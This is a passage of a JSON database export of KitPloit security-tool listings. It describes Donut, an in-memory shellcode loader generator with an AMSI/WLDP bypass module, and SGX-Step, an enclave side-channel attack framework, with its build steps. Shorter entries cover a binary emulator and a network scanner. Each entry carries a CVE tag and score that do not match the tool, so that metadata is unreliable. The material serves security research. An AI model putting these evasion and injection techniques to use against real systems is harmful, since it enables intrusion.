](<https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/> \"blog post\" ) . \nOnly PE files with relocation information (.reloc) are supported. TLS callbacks are only executed upon process creation. \n \n** Components ** \nDonut contains the following elements: \n\n\n * donut.c: The source code for the donut loader generator. \n * donut.exe: The compiled loader [ generator ](<https://www.kitploit.com/search/label/Generator> \"generator\" ) as an EXE. \n * donut.py: The donut loader generator as a Python script _ (planned for version 1.0) _\n * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. \n * setup.py: The setup file for installing Donut as a Pip Python3 module. \n * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform. \n * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform. \n * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project. \n * loader/loader.c: Main file for the shellcode. \n * loader/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. \n * loader/inmem_pe.c: In-Memory loader for EXE/DLL files. \n * loader/inmem_script.c: In-Memory loader for VBScript/JScript files. \n * loader/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. \n * loader/wscript.c: Supports a number of WScript methods that cscript/wscript support. \n * loader/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP). \n * loader/http_client.c: Downloads a module from remote staging server into memory. \n * loader/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). \n * loader/clib.c: Replaces common C library functions like memcmp, memcpy and memset. \n * loader/inject.exe: The compiled C shellcode injector. \n * loader/inject.c: A C shellcode injector that injects loader.bin into a specified process for testing. \n * loader/runsc.c: A C shellcode runner for testing loader.bin in the simplest manner possible. \n * loader/runsc.exe: The compiled C shellcode runner. \n * loader/exe2h/exe2h.c: Source code for exe2h. \n * loader/exe2h/exe2h.exe: Extracts the useful machine code from loader.exe and saves as array to C header file. \n * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. \n * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. \n \n** Subprojects ** \nThere are three companion projects provided with donut: \n\n\n * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. \n * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. \n * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. \n * ProcessManager: A Process [ Discovery ](<https://www.kitploit.com/search/label/Discovery> \"Discovery\" ) tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. \n \n** Project plan ** \n\n\n * ~~ Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module. ~~\n * Create a C# version of the generator. \n * Create a donut.py generator that uses the same command-line parameters as donut.exe. \n * Add support for HTTP proxies. ~~ * Find ways to simplify the shellcode if possible. ~~\n * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design loaders that work with it. \n * ~~ Dynamic Calls to DLL functions. ~~\n * Handle the ProcessExit event from AppDomain using unmanaged code. \n \n \n\n\n** [ Download Donut ](<https://github.com/TheWover/donut> \"Download Donut\" ) **\n", "edition": 8, "modified": "2019-11-07T20:43:03", "published": "2019-11-07T20:43:03", "id": "KITPLOIT:4989262875523087055", "href": "http://www.kitploit.com/2019/11/donut-generates-x86-x64-or-amd64x86.html", "title": "Donut - Generates X86, X64, Or AMD64+x86 Position-Independent Shellcode That Loads .NET Assemblies, PE Files, And Other Windows Payloads From Memory", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T20:25:59", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-BlJwMNMMZWY/XbT6I0mZAEI/AAAAAAAAQww/dXmQnr2oYXE_qdaZPxCzv_2M-Q2OGVpkwCNcBGAsYHQ/s1600/sgx-step_2_framework.png>)\n\n \nSGX-Step is an open-source framework to facilitate side-channel attack research on Intel SGX platforms. SGX-Step consists of an [ adversarial ](<https://www.kitploit.com/search/label/Adversarial> \"adversarial\" ) Linux kernel driver and user space library that allow to configure untrusted page table entries and/or x86 APIC timer interrupts completely from user space. Our research results have demonstrated several new and improved enclaved execution attacks that gather side-channel observations at a maximal temporal resolution (i.e., by interrupting the victim enclave after _ every _ single instruction). \n \n** Abstract ** \nTrusted execution environments such as Intel SGX hold the promise of protecting sensitive computations from a potentially compromised operating system. Recent research convincingly demonstrated, however, that SGX's strengthened adversary model also gives rise to to a new class of powerful, low-noise side-channel attacks leveraging first-rate control over hardware. These attacks commonly rely on frequent enclave preemptions to obtain fine-grained side-channel observations. A maximal temporal resolution is achieved when the victim state is measured after every instruction. Current state-of-the-art enclave execution control schemes, however, do not generally achieve such instruction-level granularity. \nThis paper presents SGX-Step, an open-source Linux kernel framework that allows an untrusted host process to configure APIC timer interrupts and track page table entries directly from user space. We contribute and evaluate an improved approach to single-step enclaved execution at instruction-level granularity, and we show how SGX-Step enables several new or improved attacks. Finally, we discuss its implications for the design of effective defense mechanisms. \n\n\n> Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17). \n\n \n** Overview ** \nCrucial to the design of SGX-Step, as opposed to previous enclave preemption proposals, is the creation of user-space virtual memory mappings for physical memory locations holding page table entries, as well as for the local APIC memory-mapped I/O configuration registers and the x86 Interrupt Descriptor Table (IDT). This allows an untrusted, attacker-controlled host process to easily (i) track or modify enclave page table entries, (ii) configure the APIC timer one-shot/periodic interrupt source, (iii) trigger inter-processor interrupts, and (iv) register custom interrupt handlers completely _ within _ user space. \n \n\n\n[  ](<https://1.bp.blogspot.com/-BlJwMNMMZWY/XbT6I0mZAEI/AAAAAAAAQww/X_KPeSaYv8ccXMmJYVbRFKw06W9HOCOkACEwYBhgL/s1600/sgx-step_2_framework.png>)\n\n \nThe above figure summarizes the sequence of hardware and software steps when interrupting and resuming an SGX enclave through our framework. \n\n\n 1. The local APIC timer interrupt arrives within an enclaved instruction. \n 2. The processor executes the AEX [ procedure ](<https://www.kitploit.com/search/label/Procedure> \"procedure\" ) that securely stores execution context in the enclave\u2019s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT. \n 3. At this point, any attack-specific, spy code can easily be plugged in. \n 4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can _ optionally _ be instrumented to retrieve the stored instruction pointer from the interrupted enclave\u2019s SSA frame. For this, our ` /dev/sgx-step ` driver offers an optional IOCTL call for the privileged ` EDBGRD ` instruction. \n 5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ` ERESUME ` . \n \n** Building and Running ** \n \n** 0\\. System Requirements ** \nSGX-Step requires an [ SGX-capable ](<https://github.com/ayeks/SGX-hardware> \"SGX-capable\" ) Intel processor, and an off-the-shelf Linux kernel. Our evaluation was performed on i7-6500U/6700 CPUs, running Ubuntu 16.04 with a stock Linux 4.15.0 kernel. We summarize Linux [ kernel parameters ](<https://wiki.archlinux.org/index.php/Kernel_parameters> \"kernel parameters\" ) below. \nLinux kernel parameter | Motivation \n---|--- \n` nox2apic ` | Configure local APIC device in memory-mapped I/O mode (to make use of SGX-Step's precise single-stepping features). \n` iomem=relaxed, no_timer_check ` | Suppress unneeded warning messages in the kernel logs. \n` isolcpus=1 ` | Affinitize the victim process to an isolated CPU core. \n` dis_ucode_ldr ` | Disable CPU microcode updates ( [ Foreshadow ](<https://foreshadowattack.eu/> \"Foreshadow\" ) /L1TF mitigations may affect single-stepping interval). \nPass the desired boot parameters to the kernel as follows: \n\n \n \n $ sudo vim /etc/default/grub\n # GRUB_CMDLINE_LINUX_DEFAULT=\"quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1\"\n $ sudo update-grub && sudo reboot\n\nFinally, in order to reproduce our experimental results, make sure to disable C-States and SpeedStep technology in the BIOS configuration. The table below lists currently supported Intel CPUs, together with their single-stepping APIC timer interval ( ` libsgxstep/config.h ` ). \nModel name | CPU | Base frequency | APIC timer interval \n---|---|---|--- \nSkylake | [ i7-6700 ](<https://ark.intel.com/products/88196> \"i7-6700\" ) | 3.4 GHz | 19 \nSkylake | [ i7-6500U ](<https://ark.intel.com/products/88194> \"i7-6500U\" ) | 2.5 GHz | 25 \nSkylake | [ i5-6200U ](<https://ark.intel.com/products/88193> \"i5-6200U\" ) | 2.3 GHz | 28 \nKaby Lake R | [ i7-8650U ](<https://ark.intel.com/products/124968> \"i7-8650U\" ) | 1.9 GHz | 34 \nCoffee Lake R | [ i9-9900K ](<https://ark.intel.com/products/186605> \"i9-9900K\" ) | 3.6 GHz | 21 \n \n** 1\\. Patch and install SGX SDK ** \nTo enable easy registration of a custom Asynchronous Exit Pointer (AEP) stub, we modified the untrusted runtime of the official Intel SGX SDK. Proceed as follows to checkout [ linux-sgx ](<https://github.com/01org/linux-sgx> \"linux-sgx\" ) v2.6 and apply our patches. \n\n \n \n $ git submodule init\n $ git submodule update\n $ ./install_SGX_driver.sh # tested on Ubuntu 16.04\n $ ./patch_sdk.sh\n $ ./install_SGX_SDK.sh # tested on Ubuntu 16.04\n\nThe above install [ scripts ](<https://www.kitploit.com/search/label/Scripts> \"scripts\" ) are tested on Ubuntu 16.04 LTS. For other GNU/Linux distributions, please follow the instructions in the [ linux-sgx ](<https://github.com/01org/linux-sgx> \"linux-sgx\" ) project to build and install the Intel SGX SDK and PSW packages. You will also need to build and load an (unmodified) [ linux-sgx-driver ](<https://github.com/01org/linux-sgx-driver> \"linux-sgx-driver\" ) SGX kernel module in order to use SGX-Step. \n** Note (local installation). ** The patched SGX SDK and PSW packages can be installed locally, without affecting a compatible system-wide 'linux-sgx' installation. For this, the example Makefiles support an ` SGX_SDK ` environment variable that points to the local SDK installation directory. When detecting a non-default SDK path (i.e., not ` /opt/intel/sgxsdk ` ), the \"run\" Makefile targets furthermore dynamically link against the patched ` libsgx_urts.so ` untrusted runtime built in the local ` linux-sgx ` directory (using the ` LD_LIBRARY_PATH ` environment variable). \n** Note (32-bit support). ** Instructions for building 32-bit versions of the SGX SDK and SGX-Step can be found in [ README-m32.md ](<https://github.com/jovanbulck/sgx-step/blob/master/README-m32.md> \"README-m32.md\" ) . \n \n** 2\\. Build and load ` /dev/sgx-step ` ** \nSGX-Step comes with a loadable kernel module that exports an IOCTL interface to the ` libsgxstep ` user-space library. The driver is mainly responsible for (i) hooking the APIC timer interrupt handler, (ii) collecting untrusted page table mappings, and optionally (iii) fetching the interrupted instruction pointer for benchmark enclaves. \nTo build and load the ` /dev/sgx-step ` driver, execute: \n\n \n \n $ cd kernel\n $ make clean load\n\n** Note (/dev/isgx). ** Our driver uses some internal symbols and data structures from the official Intel ` /dev/isgx ` driver. We therefore include a git submodule that points to an unmodified v2.1 [ linux-sgx-driver ](<https://github.com/intel/linux-sgx-driver> \"linux-sgx-driver\" ) . \n** Note (/dev/mem). ** We rely on Linux's virtual ` /dev/mem ` device to construct user-level virtual memory mappings for APIC physical memory-mapped I/O registers and page table entries of interest. Recent Linux distributions typically enable the ` CONFIG_STRICT_DEVMEM ` option which prevents such use, however. Our ` /dev/sgx-step ` driver therefore includes an [ approach ](<https://www.libcrack.so/2012/09/02/bypassing-devmem_is_allowed-with-kprobes/> \"approach\" ) to bypass ` devmem_is_allowed ` checks, without having to recompile the kernel. \n \n** 3\\. Build and run test applications ** \nUser-space applications can link to the ` libsgxstep ` library to make use of SGX-Step's single-stepping and page table [ manipulation ](<https://www.kitploit.com/search/label/Manipulation> \"manipulation\" ) features. Have a look at the example applications in the \"app\" directory. \nFor example, to build and run the ` strlen ` attack from the paper for a benchmark enclave that processes the secret string 100 repeated times, execute: \n\n \n \n $ cd app/bench\n $ NUM=100 STRLEN=1 make parse # alternatively vary NUM and use BENCH=1 or ZIGZAG=1\n $ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine;\n $ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine)\n $ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation\n $ # use M32=1 To produce a 32-bit executable\n\nThe above command builds ` libsgxstep ` , the benchmark victim enclave, and the untrusted attacker host process, where the attack scenario and instance size are configured via the corresponding environment variables. The same command also runs the resulting binary non-interactively (to ensure deterministic timer intervals), and finally calls an attack-specific post-processing Python script to parse the resulting enclave instruction pointer benchmark results. \n** Note (performance). ** Single-stepping enclaved execution incurs a substantial slowdown. We measured execution times of up to 15 minutes for the experiments described in the paper. SGX-Step's page table manipulation features allow to initiate single-stepping for selected functions only, for instance by revoking access rights on specific code or data pages of interest. \n** Note (timer interval). ** The exact timer interval value depends on CPU frequency, and hence remains inherently platform-specific. Configure a suitable value in ` /app/bench/main.c ` . We established precise timer intervals for our evaluation platforms (see table above) by tweaking and observing the NOP microbenchmark enclave instruction pointer trace results. \n \n** Using SGX-Step in your own projects ** \nThe easiest way to get started using the SGX-Step framwork in your own projects, is through [ git submodules ](<https://git-scm.com/book/en/v2/Git-Tools-Submodules> \"git submodules\" ) : \n\n \n \n $ cd my/git/project\n $ git submodule add [email\u00a0protected]:jovanbulck/sgx-step.git\n $ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above\n\nHave a look at the Makefiles in the ` app ` directory to see how a client application can link to ` libsgxstep ` plus any local SGX SDK/PSW packages. \n \n \n\n\n** [ Download Sgx-Step ](<https://github.com/jovanbulck/sgx-step> \"Download Sgx-Step\" ) **\n", "edition": 49, "modified": "2019-11-09T20:59:04", "published": "2019-11-09T20:59:04", "id": "KITPLOIT:7855208041571910068", "href": "http://www.kitploit.com/2019/11/sgx-step-practical-attack-framework-for.html", "title": "Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:30:47", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-fPbFuuC7blU/XbT4CJyEZbI/AAAAAAAAQv8/WVzwGogBpFsEhLuVpyzhbz_O3XU9yIWiACNcBGAsYHQ/s1600/Binary%2BAnalysis%2BFramework.jpg>)\n\n \n_ Sojobo _ is an [ emulator ](<https://www.kitploit.com/search/label/Emulator> \"emulator\" ) for the [ B2R2 ](<https://b2r2.org/> \"B2R2\" ) framework. It was created to easier the [ analysis ](<https://www.kitploit.com/search/label/Analysis> \"analysis\" ) of potentially malicious files. It is totally developed in .NET so you don't need to install or compile any other external libraries (the project is self contained). \nWith _ Sojobo _ you can: \n\n\n * Emulate a (32 bit) PE binary \n * Inspect the memory of the emulated process \n * Read the process state \n * Display a disassembly of the executed code \n * Emulate functions in a managed language (C# || F#) \n\n \n\n\n** Using Sojobo ** \n_ Sojobo _ is intended to be used as a framework to create [ program analysis ](<https://www.kitploit.com/search/label/Program%20Analysis> \"program analysis\" ) utilities. However, various [ ** sample utilities ** ](<https://github.com/enkomio/Sojobo/tree/master/Src/Examples> \"A binary analysis framework \\(8\\)\" ) were created in order to show how to use the framework in a profitable way. \n \n** Tengu ** \n_ Tengu _ is an utility which is based on _ Sojobo _ . It allows to emulate a given process and control the execution by providing a [ debugger ](<https://www.kitploit.com/search/label/Debugger> \"debugger\" ) like UI (in particular it was inspired by the windbg debugger). \n \n** Documentation ** \nThe project is fully documented in F# (cit.) :) Joking apart, I plan to write some blog posts related to how to use Sojobo. Below a list of the current posts: \n\n\n * [ Sojobo - Yet another binary analysis framework ](<https://antonioparata.blogspot.com/2019/05/sojobo-yet-another-binary-analysis.html> \"Sojobo - Yet another binary analysis framework\" )\nYou can also read the ** [ API documentation ](<https://github.com/enkomio/Sojobo/blob/master/DOCUMENTATION.md> \"API documentation\" ) ** . \n \n** Compile ** \nIn order to compile Sojobo you need .NET Core to be installed and Visual Studio. To compile just run ** build.bat ** . \n \n \n\n\n** [ Download Sojobo ](<https://github.com/enkomio/Sojobo> \"Download Sojobo\" ) **\n", "edition": 8, "modified": "2019-11-08T12:00:04", "published": "2019-11-08T12:00:04", "id": "KITPLOIT:2733281407321922021", "href": "http://www.kitploit.com/2019/11/sojobo-binary-analysis-framework.html", "title": "Sojobo - A Binary Analysis Framework", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T20:28:03", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-Llo-oWt_Olk/Xct7gab8TrI/AAAAAAAAQzQ/n4c3B6J6C6472jHHr_zNIaNx2BNvzn6AgCNcBGAsYHQ/s1600/NetAss2_1_netass2-menu.png>)\n\n \nEasier network [ scanning ](<https://www.kitploit.com/search/label/Scanning> \"scanning\" ) with NetAss2 (Network Assessment Assistance Framework). \n \nMake it easy for Pentester to do [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) on network. \n \n** Dependencies ** \n\n\n * nmap (tool) \n * zmap (tool) \n \n** Installation ** \n\n \n \n git clone https://github.com/zerobyte-id/NetAss2.git\n \n \n cd NetAss2\n \n \n sudo chmod +x install.bash\n \n \n sudo ./install.bash\n\n \n** Run ** \n\n \n \n netass2\n\n \n** Existing Menu ** \n\n \n \n - HOST DISCOVERY\n - PORT SCAN ON SINGLE HOST\n - MASSIVE PORT SCAN VIA DISCOVERED HOSTS\n - MASSIVE PORT SCAN VIA LIST ON FILE\n - SINGLE PORT QUICK SCAN VIA NETWORK BLOCK\n - MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK\n - SHOW REPORTS\n\n \n** Screenshot (Documentation) ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-Uwuk0Jb16wY/Xct7na8hBhI/AAAAAAAAQzU/5kCUR7kFlsUDE00a4XSV0hrsMH_9RXi2ACNcBGAsYHQ/s1600/NetAss2_2_netass2-host.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-ZI9awVpwgmY/Xct7ndSILaI/AAAAAAAAQzY/fsHxVfegvLQT36fZFX2eY1vqFKy7p96UACNcBGAsYHQ/s1600/NetAss2_3_netass2-port.png>)\n\n \n \n\n\n** [ Download NetAss2 ](<https://github.com/zerobyte-id/NetAss2> \"Download NetAss2\" ) **\n", "edition": 6, "modified": "2019-11-13T11:41:03", "published": "2019-11-13T11:41:03", "id": "KITPLOIT:6340010267131466453", "href": "http://www.kitploit.com/2019/11/netass2-network-assessment-assistance.html", "title": "NetAss2 - Network Assessment Assistance Framework", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
